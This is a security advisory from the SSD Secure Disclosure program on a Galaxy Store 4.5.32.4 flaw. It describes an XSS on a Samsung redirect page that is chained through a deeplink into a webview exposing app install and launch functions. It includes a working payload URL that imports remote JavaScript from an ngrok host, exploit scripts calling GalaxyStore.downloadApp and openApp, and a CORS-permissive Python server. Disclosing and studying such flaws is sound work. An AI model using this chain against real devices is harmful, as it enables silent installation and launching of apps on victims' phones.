SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction

TL;DR

A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.

Vulnerability Summary

In the Galaxy Store application, there are some deeplinks handled. Deeplink can be called from another application or from a browser. When receiving suitable deeplinks Galaxy Store will process and display them via webview.

Here, by not checking the deeplink securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application.

Credit

An independent security researcher has reported this to the SSD Secure Disclosure program.

Affected Versions

Galaxy Store version 4.5.32.4

Technical Analysis

First we will pay attention to a website SamSung MCS Direct Page: https://us.mcsvc.samsung.com/mcp25/devops/redirect.html

When we access the website, it will look like this:

However if you reverse the Galaxy Store app you can find out that they need the following parameters: mcs_ru and testMode. Here is the MCS site result with parameters:

We can see that it contains the content of intents that have not been deeplinked to be sent to Samsung’s applications for processing such as Samsung Pay, Bixby, Samsungapp, Gamelauncher,…

Pay attention here to the deeplinks sent to Samsungapp. Let’s see an example as follows:
samsungapps://MCSLaunch?action=each_event&url={{url}}, when this deeplink is sent, the Galaxy Store will handle it as follows:

  1. App will check the deeplink through the string samsungapps
  2. Then if there is a string MCSLaunch the app will proceed with the MCS Webview process
  3. Finally take the url parameter and load it with the Webview.loadurl

There is one interesting thing here, we return to the SamSung MCS Direct Page website. This website will parse the parameter from the url and then display it on the website, but it did not encode, leading to an XSS error as follows:

We can see the website is processing the abc, def parameters and displaying as above without encoding, the url is passed directly to href this is very dangerous and will cause XSS.

A proof of concept would be as simple as:
https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a&testMode=1&%22id=%22%3Ca%20id%3d%22%3E%3Csvg/onload%3dalert(1)%3E%22%3E

Well it’s a basic error, exploiting is simple.

Now we will proceed to combine it with the Galaxy Store. We observe the deeplink process code and display it on the webview.

webSettings.setJavaScriptEnabled(true); // allow JS execution
webSettings.setJavaScriptCanOpenWindowsAutomatically(true);
WebView webView = this.c;
webView.addJavascriptInterface(new McsWebBridge(this, webView, new McsWebBridgeProvider()), "McsBridge");
WebView webView2 = this.c;
webView2.addJavascriptInterface(new McsWebBridge(this, webView2, new GmpWebBridgeProvider()), "GmpBridge");
this.l = new EditorialScriptInterface(this, this.c);
this.c.addJavascriptInterface(this.l, "GalaxyStore"); // add JS interface so that JS can call functions defined in Java class.

We observe the Class EditorialScriptInterface:

@JavascriptInterface
public void downloadApp(String str){...}
@JavascriptInterface
public void openApp(String str) {...}

We notice the two functions downloadApp and openApp here these two functions will get the app id and download them from the store or open them. Thereby we can use JS code to call these two functions. The POC is as simple as this:

window.GalaxyStore.openApp("com.sec.android.app.popupcalculator"); // Open app calc
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");// Download app calc

Proof of concept

We will design a simple website like this:

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  </head>
  <body>
    <a href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://xxxxxx.ngrok.io/open.js%27)%3e%22%3e">1 click</a>
  </body>
</html>

The file open.js will open the calc app.

The file download.js will open the calc app.

The file down_and_open.js will download then open calc app.

To be able to successfully exploit the victim’s server, it is necessary to have https and CORS bypass of chrome. We will use python and ngrok for setup.

The steps are as follows:

  1. Run the file https.py to bypass CORS and open a server on port 8000
  2. Run ngrok.exe http 8000
  3. On a samsung device, use chrome to access the victim server and click on the link.

Vendor Response

The vendor has issued patches which are now in wide circulation for all Samsung devices.

Exploit

// down_and_open.js
function testCallBack(){
    setTimeout(()=>{
        window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");
    },20000);
    window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");
}

testCallBack();
// download.js
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");
#!/usr/bin/python3
# https.py
import os
import sys
import http.server
import socketserver

PORT = 8000


class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        http.server.SimpleHTTPRequestHandler.end_headers(self)


def server(port):
    httpd = socketserver.TCPServer(('', port), HTTPRequestHandler)
    return httpd


if __name__ == "__main__":
    port = PORT
    httpd = server(port)
    try:
        # os.chdir('build')
        print("nserving from build/ at localhost:" + str(port))
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("n...shutting down http server")
        httpd.shutdown()
        sys.exit()
<!-- index.html -->
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
  </head>
  <body>
    <a
      href="samsungapps://MCSLaunch?action=each_event&amp;url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://cf89a4eb207f.ngrok.io/down_and_open.js%27)%3e%22%3e"
      >1 click</a
    >
  </body>
</html>
// open.js
window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");

Demo

?

Get in touch